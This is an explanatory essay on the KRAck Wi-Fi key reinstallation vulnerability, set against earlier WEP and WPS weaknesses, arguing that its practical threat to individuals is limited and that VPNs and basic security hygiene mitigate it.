One of the most ubiquitous ways of accessing the Internet today is through the IEEE 802.11 protocol of communications, commonly known as Wi-Fi. Throughout its highly impactful existence, 802.11 has experienced massive adoption and implementation throughout nearly every organization and institution.
From the behemoth Fortune 500 companies to the small home office, Wi-Fi is in nearly every device. However, rapid adoption has also led to inconsistent implementation, and a constant barrage of attempts to identify vulnerabilities in the protocol’s security mechanisms. Most recently, the WPA Key Reinstallation Attack (KRAck) has created a fervor within the cybersecurity community and many of the aforementioned organizations. However, if individuals take some time to seriously examine the vulnerability, within context of other wireless vulnerabilities, they will identify that while this matter is a serious issue, its usefulness as an attack vector is limited.
Comprehensive understanding of the KRAck vulnerability requires a closer examination of Wi-Fi as a communication protocol and its history of exploitation. Exploiting wireless is very similar to buying a home – it’s all about ‘location, location, location!’ This is what makes Wi-Fi convenient for those implementing the protocol and infuriating for those attempting to exploit it. Continuing the example, many homeowners implement Wi-Fi to forego the costly experience of installing cable-based communications, such as ethernet or fiber. Additionally, the implementation of Wi-Fi allows individuals to move more freely within their home and take their laptops and tablets with them from room to room without worrying about connecting to a wall or outlet. This level of convenience was unprecedented in the early days of Wi-Fi adoption, yet, a focus on ease came at the cost of security.
The first Wi-Fi encryption protocol exploited was Wired Equivalent Privacy (WEP). Many users previously mistook this mechanism as a suitable security protocol, and it saw wide acceptance in the early 2000s. However, it did not take security researchers and hackers very long to find the inherent weakness within WEP encryption. Specifically, if attackers listened to the signal long enough, they would soon be able to gather enough data to crack the single-key encryption, thus exposing all network data as it was transmitted. As global understanding of this weakness spread, adoption of Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) became greater.
The inherent benefits of WPA and WPA2 become obvious under close inspection. Broadly speaking, the encryption of the communications changes every time a computer connects to the network, thanks to a unique four-way encryption establishment process between the access point and the associating device. Around 2012, security researches realized that by conducting a brute force attack against a router with Wi-Fi Protected Setup (WPS) registrar PINs, they could recover the WPA/WPA2 passphrases which would allow them to decrypt WPA/WPA2 traffic. However, this process required extensive processing power, and the complete four-way handshake still needed to be collected by the attacker each time a computer associated to the network, making the attack difficult.
The KRAck attack is unique in that it subverts the very four-way handshake itself. Through subverting the four-way handshake, the attacker can trick the associating computer into using a previously installed key, thus the name of the attack ‘Key Reinstallation Attack’. This is incredibly dangerous, as much of WPA’s security lies in its continual change of encryption keys each time a device associates to a network. As a result, attackers can view victim data easier and longer. Additionally, they can forge packets, appearing to come from a victim, sending them to other servers. This attack is both ingenious and concerning.
While the concern over the KRAck vulnerability is merited, especially considering the level of damage it can do to the individual, it is important to view it holistically. The attack still relies on a few key factors for success, careful timing on the part of the attacker to inject the appropriate packets to fool a user device, and proper placement to conduct such an attack. Both are exceedingly difficult in comparison to other attack vectors, thanks to the nature of Wi-Fi.
First, in the instance of timing, attackers must inject their misleading packets at just the right time and hope that they reach the victim in the right order. Working with wireless, this can be exceedingly difficult as environmental factors, such as walls, and overall signal noise from other devices and networks lead to signal and data degradation in most practical environments. Second, to attack an individual, proximity is required. Unless the attacker invests in extensive wireless amplifiers and antennas, surreptitious implementation of a KRAck attack is difficult – again, success is all about location, location, location.
When viewed within the context of Wi-Fi as a communications protocol and the previous vulnerabilities experienced by associated security mechanisms, it becomes clear that KRAck really is not anything very new or special when it comes to security practices. While the exploitation itself is ingenious, proper security hygiene still protects the average user.
Using virtual private networks (VPNs) at public hotspots (or not using public hotspots at all) will continue to protect the individual abroad. Concerns in the office are mitigated by the response plans implemented by corporations worldwide. Finally, at home, one needs to consider if a malicious actor will take the time to visit them in order to start the laborious process to try and inject each computer association. Considering these factors, KRAck, while certainly a legitimate threat, is not as worrisome for the individual as some may think.